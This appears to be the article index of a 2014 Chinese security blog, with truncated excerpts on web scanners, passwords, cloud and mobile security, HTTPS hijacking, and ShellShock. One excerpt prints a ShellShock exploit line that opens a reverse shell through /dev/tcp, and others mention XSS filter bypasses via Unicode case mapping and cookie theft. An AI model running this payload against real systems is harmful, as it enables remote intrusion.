安全知识

admin 11年前 (2014-11-06) 2275浏览 0评论

随着公众对Web安全的聚焦，越来越多的行业领域如运营商、政府电子政务互动平台、企事业门户网站及教育医疗机构等都已经 开始频繁使用扫描器去评估其风险性，以便提前发现潜在的安全隐患，及时安全加固以保障网站业务的正常持续运转。反观扫描器使用群体的变化，已...

admin 11年前 (2014-11-06) 1736浏览 0评论

安全牛点评： 在用户数据大量泄露的今天，密码成了众矢之的和替罪羊。实际上安全专家们至今也没有从用户的角度出发给出可行的“复杂密码”最佳实践。 设置密码、记住密码、密码被脱裤…更新密码…然后忘记密码，密码的复杂性与易用性的矛盾始终没有解决，“复杂密...

admin 11年前 (2014-11-01) 2232浏览 0评论

博文作者：xti9er 发布日期：2014-10-24 阅读次数：1106 博文内容：        云 计算平台是目前比较火的产业，腾讯也有面向企业和个人的公有云平台——腾讯云。笔者所在的腾讯安全中心也负责腾讯云的部分安全职责，因为工作关系，笔者也...

admin 11年前 (2014-10-31) 2254浏览 0评论

目前就信息安全威胁来说，最为常见的两种形式是拒绝服务和数据泄露。随着国内信息技术的不断发展，“拖库”之类的数据泄露事件也越来越多。为此，绿盟科技 威胁响应中心每天都在持续追踪及研究，并定期发布相关报告。此报告即为《2014 H1 绿盟科技DDoS威胁...

admin 11年前 (2014-10-30) 2744浏览 0评论

php做为一门当下非常流行的web语言，常常看到有人求解密php文件，想当年的asp也是一样。一些人不理解为什么要混淆(加密)，甚至鄙视混淆(加密)，在我看来混淆加密代码可以用来防一般的小人，会起到一定的保护作用。 加密的原因： 1. 保护代码，防止...

admin 11年前 (2014-10-24) 1739浏览 0评论

前言 上一篇文章 讲解了如何借助前端技术，打造一个比 SSLStrip 更高大上的工具。 今天我们再次使用这套战术，通过前后端的里应外合，实现一个杀手锏级的攻击方案 —— Cookie 数据大喷发。 传统嗅探 在过去，Cookie 的窃取大多通过嗅...

admin 11年前 (2014-10-20) 2334浏览 0评论

这次我（知道创宇余弦）在 QCon 上海做了《程序员与黑客》的演讲，得到很多认可，这点很欣慰。不过演讲超时20分钟，这点不应该。很多同学意犹未尽，我也是。 这篇文章我说说，我为什么要讲这个议题。 我 2008年毕业就进入网络安全公司知道创宇，跟随几...

admin 11年前 (2014-10-20) 2341浏览 0评论

最近有不少大咖在谈“降维打击”，大体意思是说水平不在一个层次，思维不在一个层次的战斗。例如我们生活在三维空间，除了平面以外，还有深度，但是对于蚂蚁来说，蚂蚁只知道前后左右，没有上下，那么它的世界就是二维的。 “降维打击”这个词，应该来自于刘新慈的小说...

admin 11年前 (2014-10-09) 1974浏览 0评论

前言 我目前正在从事HTTPS方面的性能优化工作。在HTTPS项目的开展过程中明显感 觉到目前国内互联网对HTTPS并不是很重视，其实也就是对用户隐私和网络安全不重视。本文从保护用户隐私的角度出发，简单描述现在存在的用户隐私泄露和 流量劫持现象，然...

admin 11年前 (2014-10-09) 1923浏览 0评论

随 着网站业务所承载内容的日益增多且重要性日益增强，网站本身的价值也越来越大，随之由网站漏洞带来的安全性问题也愈发严峻。新开通网站、新增专栏的准入质 量评估，网站系统日常运行状况的检查预防和风险掌控，这些已成为各行业每年安全大检查中的关键要素。作为具...

admin 11年前 (2014-10-04) 1668浏览 0评论

摘要：随着云计算产业价值逐渐显现，许多黑客开始关注这一新兴领域。不知不觉中，暗流涌动，“安全之战”响彻“云”霄。本文分别从IaaS、PaaS、SaaS三种服务模式分析云计算领域的攻防趋势。 2014年中国云计算产业继续保持2013年的发展态势，并逐渐...

admin 11年前 (2014-10-04) 2533浏览 0评论

原文：http://bbs.pediy.com/showthread.php?p=1320731 摘要：2010年，智能手机真正成熟并普及起来；同时，这一年，也被认为是现代移动安全的元年。本文从技术和商业两个层面，回顾了移动平台安全这些年所走过的路。...

admin 11年前 (2014-09-29) 2144浏览 0评论

    优酷邮箱服务器允许源地址欺骗漏洞 邮箱服务器允许源地址欺骗漏洞。可任意伪造邮箱地址利用优酷的邮箱服务器来进行发信,造成信任源乱用。 邮箱服务器允许源地址欺骗漏洞。可任意伪造邮箱地址利用优酷的邮箱服务器来进行发信,造成信任源...

admin 11年前 (2014-09-29) 1727浏览 0评论

2014中国互联网安全大会第一天结束，安全牛君在会场整整转了一天，晚上回到家不敢偷懒赶紧写稿与大家分享，让种种原因未能参会的圈内人士有个概览。（先做个广告：您的转发就是对本文的支持，thanks!） 原定九点整开始的大会，晚开始了十几分钟，会场已是人...

admin 11年前 (2014-09-29) 2146浏览 0评论

转自：http://www.aqniu.com/neotech/4515.html 前言 2014年9月12日，国内最大的漏洞报告平台wooyun.org在北京中关村皇冠假日酒店召开首届乌云峰会。安全牛作为峰会的合作媒体，全程参 与峰会，并采(dā...

admin 11年前 (2014-09-29) 3465浏览 0评论

本文PDF下载：破壳漏洞（ShellShock）应急概要 V3 密级 公开   破壳漏洞（ShellShock）应急概要  [第三版 2014/9/27 下午] 知道创宇安全研究团队 1.更新情况 版本 时间 描述 ...

admin 11年前 (2014-09-29) 4297浏览 0评论

一、命令执行漏洞分析 利用这个漏洞，需要两个条件： 服务器收到请求后，会执行bash 执行bash的时候，会将UserAgent等设置成环境变量 同时满足这两点的，一般是使用CGI的服务器，所以受到影响的服务器份额(我语文不好)不是很大。 对它进...

admin 11年前 (2014-09-25) 5883浏览 0评论

ps:利用payload curl http://xxx.xxx.xxx.xxx/cgi-bin/vulnerable -A "() { :;}; /bin/sh -i >& /dev/tcp/REVERSE_SHELL_IP...

admin 11年前 (2014-09-24) 2910浏览 0评论

 最近一直忙于团建的工作，能够完全静下心来的时间也比较短，但团队的分享约定不能忘，同时也为了欢迎即将入队的一位新成员，在这里跟大家分享下Web2.0爬虫的一些技术点，希望对大家有些帮助，大家可以结合【这篇文章】一起来看，收获应该会更大，对其实Web2...

admin 11年前 (2014-09-23) 4791浏览 0评论

ps:在toUpperCase()函数中，字符ı会转变为I，字符ſ会变为S。在toLowerCase()函数中，字符İ会转变为i，字符K会转变为k。利用这些特性可以绕过xss的某些防御。 toUpperCase(): ı ==>I ſ ...